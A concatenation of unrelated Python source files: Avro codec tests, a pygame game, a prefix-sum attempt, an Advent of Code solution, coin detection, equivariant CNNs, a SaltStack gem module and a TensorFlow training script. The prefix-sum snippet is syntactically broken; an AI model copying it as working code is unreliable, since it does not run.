"type": "map",
"values": {"type": "array", "items": "int"},
},
},
{
"name": "map_of_records",
"type": {
"type": "map",
"values": {
"type": "record",
"name": "MapItem",
"fields": [{"name": "intval", "type": "int"}],
},
},
},
# Unions
{"name": "union", "type": ["int", "boolean"]},
],
},
message={
"string_field": "string_value",
"int_field": 1,
"long_field": 2,
"float_field": 3.0,
"double_field": -4.0,
"boolean_field": True,
"bytes_field": b"bytes_value",
"null_field": None,
"array_of_primitives": [5, 6, 7],
"array_of_records": [
{"array_item_field": "s1"},
{"array_item_field": "s2"},
],
"array_of_records_with_arrays": [
{"subarray": [8, 9]},
{"subarray": [10, 11]},
],
"array_of_maps": [
{"k1": True, "k2": False},
{"k3": False},
{"k4": True, "k5": True},
],
"map_of_primitives": {"k6": 1, "k7": 2},
"map_of_arrays": {"k8": [3, 4, 5], "k9": []},
"map_of_records": {"k10": {"intval": 6}},
"union": True,
},
),
testcase(
label="primitive record",
schema={
"type": "record",
"name": "Record",
"fields": [
{"type": "string", "name": "string_field"},
{"type": "int", "name": "int_field"},
{"type": "long", "name": "long_field"},
{"type": "float", "name": "float_field"},
{"type": "double", "name": "double_field"},
{"type": "boolean", "name": "boolean_field"},
{"type": "bytes", "name": "bytes_field"},
{"type": "null", "name": "null_field"},
],
},
message={
"string_field": "string_value",
"int_field": 1,
"long_field": 2,
"float_field": 3.0,
"double_field": -4.0,
"boolean_field": True,
"bytes_field": b"bytes_value",
"null_field": None,
},
),
testcase(
label="nested primitive record",
schema={
"type": "record",
"name": "Parent",
"fields": [
{
"name": "child_field",
"type": {
"type": "record",
"name": "Child",
"fields": [
{"type": "string", "name": "child_string_field"},
{"type": "int", "name": "child_int_field"},
],
},
},
{"type": "string", "name": "string_field"},
{"type": "int", "name": "int_field"},
],
},
message={
"string_field": "string_value",
"int_field": 1,
"child_field": {
"child_string_field": "child_sting_value",
"child_int_field": 2,
},
},
),
testcase(
label="name collisions in nested record",
schema={
"type": "record",
"name": "Parent",
"fields": [
{
"name": "child_field",
"type": {
"type": "record",
"name": "Child",
"fields": [
{"type": "string", "name": "string_field"},
{"type": "int", "name": "int_field"},
],
},
},
{"type": "string", "name": "string_field"},
{"type": "int", "name": "int_field"},
],
},
message={
"string_field": "string_value",
"int_field": 1,
"child_field": {
"string_field": "child_sting_value",
"int_field": 2,
},
},
),
testcase(
label="indirect primitive typename",
schema={
"type": "record",
"name": "Record",
"fields": [
{"type": {"type": "string"}, "name": "string_field"},
{"type": {"type": "int"}, "name": "int_field"},
{"type": {"type": "long"}, "name": "long_field"},
{"type": {"type": "float"}, "name": "float_field"},
{"type": {"type": "double"}, "name": "double_field"},
{"type": {"type": "boolean"}, "name": "boolean_field"},
{"type": {"type": "bytes"}, "name": "bytes_field"},
{"type": {"type": "null"}, "name": "null_field"},
],
},
message={
"string_field": "string_value",
"int_field": 1,
"long_field": 2,
"float_field": 3.0,
"double_field": -4.0,
"boolean_field": True,
"bytes_field": b"bytes_value",
"null_field": None,
},
),
testcase(
label="union_primitives",
schema={
"type": "record",
"name": "Record",
"fields": [
{
"name": "field",
"type": ["string", "long", "null", "boolean", "float"],
},
],
},
message_list=[{"field": v} for v in ("string_val", 1, None, True, 0.5)],
),
testcase(
label="map of primitives",
schema={"type": "map", "values": "int"},
message={"key1": 1, "key2": 2, "key3": 3},
),
testcase(
label="map of arrays",
schema={"type": "map", "values": {"type": "array", "items": "int"}},
message={"k8": [3, 4, 5], "k9": []},
),
testcase(
label="map of records",
schema={
"type": "map",
"values": {
"type": "record",
"name": "item",
"fields": [{"type": "int", "name": "intval"}],
},
},
message={"k10": {"intval": 6}},
),
testcase(
label="array of primitives",
schema={"type": "array", "items": "int"},
message=[1, 2, 3],
),
testcase(
label="array of records",
schema={
"type": "array",
"items": {
"type": "record",
"name": "ArrayItem",
"fields": [{"name": "array_item_field", "type": "string"}],
},
},
message=[
{"array_item_field": "s1"},
{"array_item_field": "s2"},
],
),
testcase(
label="array of records with arrays",
schema={
"type": "array",
"items": {
"type": "record",
"name": "ArrayItemWithSubarray",
"fields": [
{
"name": "subarray",
"type": {
"type": "array",
"items": "int",
},
},
],
},
},
message=[
{"subarray": [8, 9]},
{"subarray": [10, 11]},
],
),
testcase(
label="array of maps",
schema={
"type": "array",
"items": {"type": "map", "values": "boolean"},
},
message=[
{"k1": True, "k2": False},
{"k3": False},
{"k4": True, "k5": True},
],
),
testcase(
label="union",
schema=["int", "string"],
message="stringval",
),
testcase(
label="union of double",
schema=["null", "double"],
message=1.123,
),
testcase(
label="union of records",
schema={
"type": "record",
"name": "Record",
"fields": [
{
"name": "field",
"type": [
"null",
{
"type": "record",
"name": "subfield",
"fields": [{"type": "string", "name": "string_val"}],
},
],
},
],
},
message_list=[{"field": v} for v in [None, {"string_val": "abcd"}]],
),
testcase(
label="union of everything",
schema=[
"int",
"long",
"null",
"boolean",
"float",
"bytes",
"string",
{"type": "array", "items": "int"},
],
message_list=[
1,
1 << 40,
-1 << 40,
None,
False,
True,
0.0,
1.5,
b"",
b"bytes",
"",
"stringval",
[1, 2, 3],
b"123",
],
),
testcase(
label="union of fixed",
schema=[
{"type": "fixed", "size": 3, "name": "three_byte"},
{"type": "fixed", "size": 5, "name": "five_byte"},
],
message_list=[
b"123",
b"12345",
],
),
testcase(
label="union of logicals",
schema=[
{"type": "bytes", "logicalType": "decimal", "precision": 5, "scale": 4},
{"type": "string", "logicalType": "uuid"},
{"type": "int", "logicalType": "date"},
],
message_list=[
decimal.Decimal("3.1415"),
uuid.UUID("f81d4fae-7dec-11d0-a765-00a0c91e6bf6"),
datetime.date(2021, 2, 11),
],
),
testcase(label="optional", schema=["null", "int"], message_list=[1, None]),
testcase(
label="backwards optional", schema=["int", "null"], message_list=[1, None]
),
testcase(
label="toplevel primitive",
schema="int",
message=42,
),
testcase(
label="enum",
schema={"type": "enum", "name": "Foo", "symbols": ["A", "B", "C", "D"]},
message="C",
),
testcase(
label="fixed",
schema={"type": "fixed", "name": "md5", "size": 16},
message=b"1234567812345678",
),
testcase(
label="logical decimal",
schema={"type": "bytes", "logicalType": "decimal", "precision": 5, "scale": 4},
message=decimal.Decimal("3.1415"),
),
testcase(
label="logical decimal under precision",
schema={"type": "bytes", "logicalType": "decimal", "precision": 5, "scale": 2},
message=decimal.Decimal("3.14"),
),
testcase(
label="logical decimal positive exponent",
schema={"type": "bytes", "logicalType": "decimal", "precision": 5, "scale": 0},
message=decimal.Decimal("1.2345e20"),
),
testcase(
label="logical fixed decimal",
schema={
"type": "fixed",
"logicalType": "decimal",
"precision": 5,
"scale": 4,
"size": 6,
"name": "fixed_decimal",
},
message=decimal.Decimal("3.1415"),
),
testcase(
label="logical decimal without scale",
schema={"type": "bytes", "logicalType": "decimal", "precision": 4},
message=decimal.Decimal("1415"),
),
testcase(
label="logical decimal with unexpected type",
schema={"type": "string", "logicalType": "decimal"},
message="1.23",
),
testcase(
label="logical uuid",
schema={"type": "string", "logicalType": "uuid"},
message=uuid.UUID("f81d4fae-7dec-11d0-a765-00a0c91e6bf6"),
),
testcase(
label="logical uuid with unexpected type",
schema={"type": "int", "logicalType": "uuid"},
message=1,
),
testcase(
label="logical date",
schema={"type": "int", "logicalType": "date"},
message=datetime.date(2021, 2, 11),
),
testcase(
label="logical date with unexpected type",
schema={"type": "string", "logicalType": "date"},
message="hello",
),
testcase(
label="logical time-millis",
schema={"type": "int", "logicalType": "time-millis"},
message=datetime.time(12, 3, 4, 5000),
),
testcase(
label="logical time-millis with unexpected type",
schema={"type": "string", "logicalType": "time-millis"},
message="hello",
),
testcase(
label="logical time-micros",
schema={"type": "long", "logicalType": "time-micros"},
message=datetime.time(12, 3, 4, 5),
),
testcase(
label="logical time-micros with unexpected type",
schema={"type": "string", "logicalType": "time-micros"},
message="hello",
),
testcase(
label="logical timestamp-millis",
schema={"type": "long", "logicalType": "timestamp-millis"},
message=datetime.datetime(
2001, 2, 3, 4, 5, 6, 7000, tzinfo=datetime.timezone.utc
),
),
testcase(
label="logical timestamp-millis with unexpected type",
schema={"type": "string", "logicalType": "timestamp-millis"},
message="hello",
),
testcase(
label="logical timestamp-micros",
schema={"type": "long", "logicalType": "timestamp-micros"},
message=datetime.datetime(2001, 2, 3, 4, 5, 6, 7, tzinfo=datetime.timezone.utc),
),
testcase(
label="logical timestamp-micros with unexpected type",
schema={"type": "string", "logicalType": "timestamp-micros"},
message="hello",
),
testcase(
label="unknown logical type",
schema={"type": "string", "logicalType": "made-up"},
message="hello",
),
testcase(
label="recursive record",
schema={
"type": "record",
"name": "LinkedListNode",
"fields": [
{"name": "value", "type": "string"},
{"name": "next", "type": ["null", "LinkedListNode"]},
],
},
message={
"value": "a",
"next": {"value": "b", "next": {"value": "c", "next": None}},
},
),
testcase(
label="embedded recursion record",
schema={
"type": "record",
"name": "Wrapper",
"fields": [
{
"name": "list",
"type": {
"type": "record",
"name": "LinkedListNode",
"fields": [
{"name": "value", "type": "string"},
{"name": "next", "type": ["null", "LinkedListNode"]},
],
},
},
{"name": "outer", "type": "int"},
],
},
message={
"outer": 1,
"list": {
"value": "a",
"next": {"value": "b", "next": {"value": "c", "next": None}},
},
},
),
testcase(
label="nested recursion",
schema={
"type": "record",
"name": "Outer",
"fields": [
{
"name": "outer2middle",
"type": {
"name": "Middle",
"type": "record",
"fields": [
{
"name": "middle2inner",
"type": {
"name": "Inner",
"type": "record",
"fields": [
{
"name": "inner2outer",
"type": ["null", "Outer"],
},
{
"name": "inner2middle",
"type": ["null", "Middle"],
},
],
},
},
{
"name": "middle2outer",
"type": ["null", "Outer"],
},
],
},
},
{"name": "outer2inner", "type": ["null", "Inner"]},
],
},
message={
"outer2middle": {
"middle2inner": {
"inner2outer": {
"outer2middle": {
"middle2inner": {
"inner2outer": None,
"inner2middle": None,
},
"middle2outer": None,
},
"outer2inner": None,
},
"inner2middle": {
"middle2inner": {
"inner2outer": None,
"inner2middle": None,
},
"middle2outer": None,
},
},
"middle2outer": None,
},
"outer2inner": None,
},
),
]
@pytest.mark.parametrize("case", testcases, ids=[tc.label for tc in testcases])
def test_ast_compiled_reader(case):
case.assert_reader()
@pytest.mark.parametrize("case", testcases, ids=[tc.label for tc in testcases])
def test_ast_compiled_writer(case):
case.assert_writer()
def test_ast_compiler_enum_with_default():
writer_schema = {
"type": "enum",
"name": "Foo",
"symbols": ["A", "B", "C", "D", "E"],
"default": "A",
}
reader_schema = {
"type": "enum",
"name": "Foo",
"symbols": ["A", "B", "C"],
"default": "A",
}
message = "E"
message_encoded = io.BytesIO()
fastavro.write.schemaless_writer(message_encoded, writer_schema, message)
message_encoded.seek(0)
c = avroc.codegen.read.ReaderCompiler(reader_schema)
reader = c.compile()
have = reader(message_encoded)
assert have == "A"
|
import sys
from time import sleep
import pygame
from random import randint
from bullet import Bullet
from Rectangle import Rectangle
def fire_bullet(ai_settings, screen, ship, bullets):
"""如果还没有达到限制,就发射一颗子弹"""
# 创建新子弹,并将其加入到编组bullets中
if len(bullets) < ai_settings.bullets_allowed:
new_bullet = Bullet(ai_settings, screen, ship)
bullets.add(new_bullet)
def check_keydown_events(event, ai_settings, screen, ship, bullets):
"""响应按键"""
if event.key == pygame.K_DOWN:
ship.moving_down = True
elif event.key == pygame.K_UP:
ship.moving_up = True
elif event.key == pygame.K_SPACE:
fire_bullet(ai_settings, screen, ship, bullets)
elif event.key == pygame.K_q:
sys.exit()
def check_keyup_events(event, ai_settings, screen, stats, ship,
rect, bullets):
"""响应松开"""
if event.key == pygame.K_DOWN:
ship.moving_down = False
elif event.key == pygame.K_UP:
ship.moving_up = False
elif event.key == pygame.K_p and not stats.game_active:
start_game(ai_settings, screen, stats, ship, rect, bullets)
def start_game(ai_settings, screen, stats, ship, rect, bullets):
ai_settings.initialize_dynamic_settings()
# 隐藏光标
pygame.mouse.set_visible(False)
# 重置游戏统计信息
stats.reset_stats()
stats.game_active = True
#清空子弹列表
bullets.empty()
# 矩形居中,并让飞船居中
rect.center_rect()
ship.center_ship()
def check_play_button(ai_settings, screen, stats, play_button,
ship, rect, bullets, mouse_x, mouse_y):
"""在玩家单击play按钮时开始新游戏"""
button_clicked = play_button.rect.collidepoint(mouse_x, mouse_y)
if button_clicked and not stats.game_active:
start_game(ai_settings, screen, stats, ship, rect, bullets)
def check_events(ai_settings, screen, stats, play_button, ship,
rect, bullets):
"""响应按键和鼠标事件"""
for event in pygame.event.get():
if event.type == pygame.QUIT:
sys.exit()
elif event.type == pygame.KEYDOWN:
check_keydown_events(event, ai_settings, screen, ship, bullets)
elif event.type == pygame.KEYUP:
check_keyup_events(event, ai_settings, screen, stats, ship,
rect, bullets)
elif event.type == pygame.MOUSEBUTTONDOWN:
mouse_x, mouse_y = pygame.mouse.get_pos()
check_play_button(ai_settings, screen, stats, play_button,
ship, rect, bullets, mouse_x, mouse_y)
def update_screen(ai_settings, screen, stats, ship, rect, bullets,
play_button):
"""更新屏幕上的图像,并切换到新屏幕"""
# 每次循环时都重绘屏幕
screen.fill(ai_settings.bg_color)
ship.blitme()
# 在飞船和外星人后面重绘所有子弹
for bullet in bullets.sprites():
bullet.draw_bullet()
rect.draw_rect()
# 如果游戏处于非活动状态,就绘制Play按钮
if not stats.game_active:
play_button.draw_button()
# 让最近绘制的屏幕可见
pygame.display.flip()
def check_bullet_rect_collisions(ai_settings, screen, ship, rect, bullets):
"""响应子弹和矩形的碰撞"""
collision = pygame.sprite.spritecollideany(rect, bullets)
# 改变矩形的颜色,删除子弹
if collision:
ai_settings.increase_speed()
bullets.remove(collision)
rect.rect_color = (randint(0, 255), randint(0, 255), randint(0, 255))
def update_bullets(ai_settings, screen, stats, ship, rect, bullets):
"""更新子弹的位置,并删除已消失子弹"""
# 更新子弹位置
bullets.update()
# 删除已消失子弹
for bullet in bullets.copy():
if bullet.rect.right >= screen.get_rect().right:
if stats.ships_left > 0:
stats.ships_left -= 1
bullets.remove(bullet)
else:
stats.game_active = False
pygame.mouse.set_visible(True)
check_bullet_rect_collisions(ai_settings, screen, ship, rect, bullets)
def change_rect_direction(ai_settings, rect):
ai_settings.rect_direction *= -1
def check_rect_edges(ai_settings, rect):
if rect.check_edges():
change_rect_direction(ai_settings, rect)
def update_rect(ai_settings, stats, screen, ship, rect, bullets):
check_rect_edges(ai_settings, rect)
rect.update()
|
# 파이썬은 느리기 때문에 순차적으로 풀면 시간초과
# 부분합(DP)을 이용해야 한다고 함
import sys
n, m = map(int, sys.stdin.readline().split())
array = [list(map(int, sys.stdin.readline().split())) for _ in range(n)]
dp = [[0]*m for _ in range(n)]
for i in range(n):
for j in range(m):
dp[n][m] = dp[0][0]+
k = int(sys.stdin.readline())
sum = [0]*k
for k1 in range(k):
i, j, x, y = map(int, sys.stdin.readline().split())
for a in range = (i-1, x):
for b in range(j-1, y):
sum[k1] += array[a][b]
for i in sum:
print(i)
|
#!/usr/bin/env python
"""Day 16 of advent of code"""
def swap(array, index_a, index_b):
"""Swaps two elements"""
tmp = array[index_a]
array[index_a] = array[index_b]
array[index_b] = tmp
def dance(array, commands):
"""Do the dance"""
for command in commands:
if command[0] == 's':
spin_size = int(command[1:])
for _ in range(spin_size):
array.insert(0, array[-1])
del array[-1]
elif command[0] == 'x':
index_a, index_b = command[1:].split('/')
swap(array, int(index_a), int(index_b))
elif command[0] == 'p':
swap_a, swap_b = command[1:].split('/')
index_a, index_b = array.index(swap_a), array.index(swap_b)
swap(array, index_a, index_b)
def part_one(data):
"""Part one"""
array = ['a', 'b', 'c', 'd', 'e', 'f', 'g',
'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p']
commands = data.split(',')
dance(array, commands)
return ''.join(map(str, array))
def part_two(data):
"""Part two"""
array = ['a', 'b', 'c', 'd', 'e', 'f', 'g',
'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p']
commands = data.split(',')
for _ in range(1000000000 % 30):
dance(array, commands)
return ''.join(map(str, array))
if __name__ == '__main__':
with open('day16.input', 'r') as f:
INPUT_DATA = f.read()
print part_one(INPUT_DATA)
print part_two(INPUT_DATA)
|
import numpy as np
from scipy.ndimage.filters import sobel, gaussian_filter
from skimage import filter, transform, feature
from skimage import img_as_float
from coins._hough import hough_circles
def compute_center_pdf(image, radius,
low_threshold, high_threshold,
gradient_sigma=0, confidence_sigma=0):
""" Creates a map representing the probability that each point on an image
is the center of a circle.
"""
# detect edges
edges = filter.canny(image, 0, low_threshold, high_threshold)
# cdef cnp.ndarray[ndim=2, dtype=cnp.double_t] dxs, dys
smoothed = gaussian_filter(image, gradient_sigma)
normals = np.transpose(np.array([sobel(smoothed, 0),
sobel(smoothed, 1)]), (1, 2, 0))
# compute circle probability map
center_pdf = hough_circles(img_as_float(edges), normals, radius, flip=True)
# blur to account for lack of confidence in tangents
# ideally this should be part of the hough transform and it should be
# possible to specify angular and radial confidence seperately but doing so
# is crazy slow
center_pdf_smoothed = gaussian_filter(center_pdf, confidence_sigma)
return center_pdf_smoothed
def detect_possible_circles(image):
"""
"""
radius = 20 # TODO magic
step = 1.1
image = img_as_float(image)
x_coords = []
y_coords = []
radii = []
weights = []
scaled_images = transform.pyramid_gaussian(image, downscale=step)
for scaled_image in scaled_images:
scale = scaled_image.shape[0] / image.shape[0]
# don't bother searching for coins larger than the image
if scaled_image.size < (2*radius)**2:
break
center_pdf = compute_center_pdf(scaled_image, radius, 0.2, 0.3, 0, 3)
# TODO better way of detecting peeks (gmm or something
# For some reason `peak_local_max` with `indices=True` returns an
# array of vectors with the x and y axis swapped.
# using `np.nonzero` and `indices=False` is a workaround.
s_x_coords, s_y_coords = np.nonzero(
feature.peak_local_max(center_pdf, indices=False)
)
s_weights = center_pdf[s_x_coords, s_y_coords]
# Convert from scaled image to image coordinates
# At some point it would be nice to detect peaks with subpixel accuracy
# so also convert to floating point
s_x_coords = s_x_coords.astype(np.float64) / scale
s_y_coords = s_y_coords.astype(np.float64) / scale
s_radii = np.repeat(radius/scale, s_weights.size)
x_coords.append(s_x_coords)
y_coords.append(s_y_coords)
radii.append(s_radii)
weights.append(s_weights)
x_coords = np.concatenate(x_coords)
y_coords = np.concatenate(y_coords)
radii = np.concatenate(radii)
weights = np.concatenate(weights)
return x_coords, y_coords, radii, weights
def prune_overlapping(x_coords, y_coords, radii, weights, threshold=1):
""" Remove coins overlapping other coins with higher weights
"""
sorted_indices = weights.argsort()[::-1]
selected_indices = []
for i in sorted_indices:
xi, yi, ri, wi = x_coords[i], y_coords[i], radii[i], weights[i]
overlapping = False
for s in selected_indices:
xs, ys, rs = x_coords[s], y_coords[s], radii[s]
if (xs - xi)**2 + (ys - yi)**2 < (threshold * max(ri, rs))**2:
overlapping = True
break
if not overlapping:
selected_indices.append(i)
return np.array(selected_indices, dtype=np.int64)
|
import e3cnn.nn as enn
from e3cnn import gspaces
import torch.nn as nn
import numpy as np
from .base import BaseEquiv, GatedFieldType
from .ft_nonlinearity import FTNonLinearity
class SteerableCNN(BaseEquiv):
def __init__(self, in_channels=1, out_channels=1, type='spherical', max_freq=2, kernel_size=3, padding=0, initialize=True, **kwargs):
gspace = gspaces.rot3dOnR3()
super().__init__(gspace, in_channels, kernel_size, padding, **kwargs)
small_type = GatedFieldType.build(gspace, 60, type=type)
mid_type = GatedFieldType.build(gspace, 240, type=type)
final_type = GatedFieldType.build(gspace, 240, type=type, max_freq=1)
common_kwargs = {
'kernel_size': kernel_size,
'padding': self.padding,
'initialize': initialize,
}
blocks = [
self.get_block(self.input_type, small_type, **common_kwargs, stride=2),
self.get_block(small_type.no_gates(), small_type, **common_kwargs),
self.get_block(small_type.no_gates(), mid_type, **common_kwargs),
self.get_block(mid_type.no_gates(), final_type, **common_kwargs),
]
self.model = enn.SequentialModule(*blocks)
self.pool = enn.NormPool(blocks[-1].out_type)
pool_out = self.pool.out_type.size
self.final = nn.Sequential(
nn.Upsample(scale_factor=2),
nn.Conv3d(pool_out, out_channels, kernel_size=1)
)
self.crop = np.array([7,7,7])
def get_block(self, in_type, out_type, **kwargs):
layers = []
layers.append( enn.R3Conv(in_type, out_type, **kwargs) )
layers.append( enn.IIDBatchNorm3d(out_type) )
if out_type.gated is None:
layers.append( enn.ELU(out_type, inplace=True) )
else:
layers.append(
enn.MultipleModule(out_type,
labels=[
*( len(out_type.trivials) * ['trivial'] + (len(out_type.gated) + len(out_type.gates)) * ['gate'] )
],
modules=[
(enn.ELU(out_type.trivials, inplace=True), 'trivial'),
(enn.GatedNonLinearity1(out_type.gated+out_type.gates,
len(out_type.gated)*['gated']+len(out_type.gates)*['gate']), 'gate')
]
)
)
return enn.SequentialModule(*layers)
def forward(self, x):
x = self.pre_forward(x)
x = self.model(x)
x = self.pool(x)
x = x.tensor
x = self.final(x)
return x
class SteerableFTCNN(BaseEquiv):
def __init__(self,
in_channels=1,
out_channels=1,
max_freq=2,
kernel_size=3,
padding=0,
type='spherical',
initialize=True, **kwargs):
gspace = gspaces.rot3dOnR3()
super().__init__(gspace, in_channels, kernel_size, padding, **kwargs)
self.type = type
common_kwargs = {
'kernel_size': kernel_size,
'padding': self.padding,
'initialize': initialize,
}
params = [
{'max_freq': 2, 'out_channels': 120, **common_kwargs, 'stride': 2},
{'max_freq': 2, 'out_channels': 240, **common_kwargs},
{'max_freq': 2, 'out_channels': 480, **common_kwargs},
{'max_freq': 2, 'out_channels': 960, **common_kwargs},
{'max_freq': 2, 'out_channels': 240, **common_kwargs},
]
blocks = []
in_type = self.input_type
for param in params:
block, in_type = self.get_block(in_type, **param)
blocks.append(block)
self.model = enn.SequentialModule(*blocks)
self.pool = enn.NormPool(blocks[-1].out_type)
pool_out = self.pool.out_type.size
self.final = nn.Sequential(
nn.Upsample(scale_factor=2),
nn.Conv3d(pool_out, out_channels, kernel_size=1)
)
# input layer + crop of each block
self.crop = np.array([9,9,9])
@staticmethod
def get_dim(max_freq, spherical=False):
if spherical:
return sum([2*l+1 for l in range(max_freq+1)])
else:
return sum([(2*l+1)**2 for l in range(max_freq+1)])
def get_block(self, in_type, out_channels, max_freq=2, **kwargs):
if self.type == 'trivial':
return self._get_block_trivial(in_type, out_channels, **kwargs)
elif self.type in ['spherical', 'so3']:
return self._get_block_non_trivial(in_type, out_channels, max_freq=max_freq, **kwargs)
def _get_block_trivial(self, in_type, channels, **kwargs):
out_type = enn.FieldType(self.gspace, channels*[self.gspace.trivial_repr])
return enn.SequentialModule(
enn.R3Conv(in_type, out_type, **kwargs),
enn.IIDBatchNorm3d(out_type),
enn.ELU(out_type, inplace=True)
), out_type
def _get_block_non_trivial(self, in_type, out_channels, max_freq=2, **kwargs):
dim = self.get_dim(max_freq, spherical=self.type=='spherical')
channels = max(1, out_channels // dim)
ft_nonlin = FTNonLinearity(max_freq, channels, 'cube', spherical=self.type=='spherical')
mid_type, out_type = ft_nonlin.in_type, ft_nonlin.out_type
return enn.SequentialModule(
enn.R3Conv(in_type, mid_type, **kwargs),
enn.IIDBatchNorm3d(mid_type),
ft_nonlin
), out_type
def forward(self, x):
x = self.pre_forward(x)
x = self.model(x)
x = self.pool(x)
x = x.tensor
x = self.final(x)
return x
|
# -*- coding: utf-8 -*-
'''
Installation of Ruby modules packaged as gems
=============================================
A state module to manage rubygems. Gems can be set up to be installed
or removed. This module will use RVM if it is installed. In that case,
you can specify what ruby version and gemset to target.
.. code-block:: yaml
addressable:
gem.installed:
- user: rvm
- ruby: jruby@jgemset
'''
# Import salt libs
import salt.utils
def __virtual__():
'''
Only load if gem module is available in __salt__
'''
return 'gem' if 'gem.list' in __salt__ else False
def installed(name, # pylint: disable=C0103
ruby=None,
runas=None,
user=None,
version=None,
rdoc=False,
ri=False): # pylint: disable=C0103
'''
Make sure that a gem is installed.
name
The name of the gem to install
ruby: None
For RVM installations: the ruby version and gemset to target.
runas: None
The user under which to run the ``gem`` command
.. deprecated:: 0.17.0
user: None
The user under which to run the ``gem`` command
.. versionadded:: 0.17.0
version : None
Specify the version to install for the gem.
Doesn't play nice with multiple gems at once
rdoc : False
Generate RDoc documentation for the gem(s).
ri : False
Generate RI documentation for the gem(s).
'''
ret = {'name': name, 'result': None, 'comment': '', 'changes': {}, 'state_stdout': ''}
salt.utils.warn_until(
'Hydrogen',
'Please remove \'runas\' support at this stage. \'user\' support was '
'added in 0.17.0',
_dont_call_warnings=True
)
if runas:
# Warn users about the deprecation
ret.setdefault('warnings', []).append(
'The \'runas\' argument is being deprecated in favor of \'user\', '
'please update your state files.'
)
if user is not None and runas is not None:
# user wins over runas but let warn about the deprecation.
ret.setdefault('warnings', []).append(
'Passed both the \'runas\' and \'user\' arguments. Please don\'t. '
'\'runas\' is being ignored in favor of \'user\'.'
)
runas = None
elif runas is not None:
# Support old runas usage
user = runas
runas = None
gems = __salt__['gem.list'](name, ruby, runas=user)
if name in gems and version and version in gems[name]:
ret['result'] = True
ret['comment'] = 'Gem is already installed.'
return ret
elif name in gems:
ret['result'] = True
ret['comment'] = 'Gem is already installed.'
return ret
if __opts__['test']:
ret['comment'] = 'The gem {0} would have been installed'.format(name)
return ret
if __salt__['gem.install'](name,
ruby=ruby,
runas=user,
version=version,
rdoc=rdoc,
ri=ri, state_ret=ret):
ret['result'] = True
ret['changes'][name] = 'Installed'
ret['comment'] = 'Gem {0} was successfully installed.'.format(name)
else:
ret['result'] = False
ret['comment'] = 'Could not install gem {0}.'.format(name)
return ret
def removed(name, ruby=None, runas=None, user=None):
'''
Make sure that a gem is not installed.
name
The name of the gem to uninstall
ruby: None
For RVM installations: the ruby version and gemset to target.
runas: None
The user under which to run the ``gem`` command
.. deprecated:: 0.17.0
user: None
The user under which to run the ``gem`` command
.. versionadded:: 0.17.0
'''
ret = {'name': name, 'result': None, 'comment': '', 'changes': {}, 'state_stdout': ''}
salt.utils.warn_until(
'Hydrogen',
'Please remove \'runas\' support at this stage. \'user\' support was '
'added in 0.17.0',
_dont_call_warnings=True
)
if runas:
# Warn users about the deprecation
ret.setdefault('warnings', []).append(
'The \'runas\' argument is being deprecated in favor of \'user\', '
'please update your state files.'
)
if user is not None and runas is not None:
# user wins over runas but let warn about the deprecation.
ret.setdefault('warnings', []).append(
'Passed both the \'runas\' and \'user\' arguments. Please don\'t. '
'\'runas\' is being ignored in favor of \'user\'.'
)
runas = None
elif runas is not None:
# Support old runas usage
user = runas
runas = None
if name not in __salt__['gem.list'](name, ruby, runas=user):
ret['result'] = True
ret['comment'] = 'Gem is not installed.'
return ret
if __opts__['test']:
ret['comment'] = 'The gem {0} would have been removed'.format(name)
return ret
if __salt__['gem.uninstall'](name, ruby, runas=user, state_ret=ret):
ret['result'] = True
ret['changes'][name] = 'Removed'
ret['comment'] = 'Gem was successfully removed.'
else:
ret['result'] = False
ret['comment'] = 'Could not remove gem.'
return ret
|
from dataloader import *
import tensorflow as tf
import numpy as np
import argparse
import math
VAL_RATIO = 0.2
TEST_RATIO = 0.2
LOAD_FACTOR = 0.5
def train(args):
data_set = load_synthetic_data(args.data_dir, args.norm_label)
data_sets = create_train_validate_test_data_sets(data_set, VAL_RATIO, TEST_RATIO, scale=args.scale)
#train_dataset = load_shuttle_data(args.data_dir + '.trn', args.norm_label)
#validation_dataset = load_shuttle_data(args.data_dir + '.tst', args.norm_label)
#data_sets = create_train_validate_data_sets(train_dataset, validation_dataset)
max_step = data_sets.train.num_keys//args.batch_size
print(data_sets.train.num_keys)
keys_placeholder = tf.placeholder(tf.float64, shape=(None, data_sets.train.key_size), name="keys")
labels_placeholder = tf.placeholder(tf.float64, shape=(None), name="labels")
n_hidden = 16
keys_norm = keys_placeholder
if not args.fix_inputs:
print("Standardizing data...")
keys_norm = (keys_placeholder - data_sets.train.keys_mean)/data_sets.train.keys_std
#W1 = tf.Variable(tf.truncated_normal([data_sets.train.key_size, n_hidden], stddev=1.0 / math.sqrt(float(data_sets.train.key_size + n_hidden)), dtype=tf.float64), dtype=tf.float64)
#b1 = tf.Variable(tf.zeros([n_hidden], dtype=tf.float64), dtype=tf.float64)
#W2 = tf.Variable(tf.truncated_normal([n_hidden, 1], stddev=1.0 / math.sqrt(float(n_hidden + 1)), dtype=tf.float64), dtype=tf.float64)
#b2 = tf.Variable(tf.zeros([1], dtype=tf.float64), dtype=tf.float64)
#h = tf.nn.relu(tf.matmul(keys_placeholder, W1) + b1)
#preds = tf.matmul(h, W2) + b2
#h = tf.nn.sigmoid(tf.matmul(keys_placeholder, W1) + b1)
#preds = tf.matmul(h, W2) + b2
h1 = tf.layers.dense(inputs=keys_norm, units=n_hidden, activation=tf.nn.relu)
h2 = tf.layers.dense(inputs=h1, units=n_hidden, activation=tf.nn.relu)
preds = tf.layers.dense(inputs=h2, units=1)
loss = tf.losses.mean_squared_error(labels=labels_placeholder, predictions=preds)
optimizer = tf.train.AdamOptimizer(args.lr)
global_step = tf.Variable(0, name='global_step', trainable=False)
train_op = optimizer.minimize(loss, global_step=global_step)
init = tf.global_variables_initializer()
with tf.Session() as sess:
sess.run(init)
for epoch in range(args.epoch):
print("epoch: ", epoch)
for step in range(max_step):
keys_feed, labels_feed = data_sets.train.next_batch(args.batch_size, True)
feed_dict = {keys_placeholder: keys_feed, labels_placeholder: labels_feed}
_, thao = sess.run([train_op, loss], feed_dict=feed_dict)
keyss, pred = sess.run([keys_norm, preds], feed_dict=feed_dict)
diff = np.mean(np.abs(pred - labels_feed)/args.scale)
if (step+1) == 1:
#print((labels_feed//args.scale).T)
#print(pred.T)
print('Step %d: loss = %.10f, diff = %.5f' % (step, np.sqrt(thao), diff))
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Training')
parser.add_argument('-data_dir', default='../data/normal_mean=1_std=1.txt')
parser.add_argument('-lr', type=float)
parser.add_argument('-batch_size', type=int)
parser.add_argument('-hidden_width', nargs='+', type=int, default=[16])
parser.add_argument('-epoch', type=int, default=5)
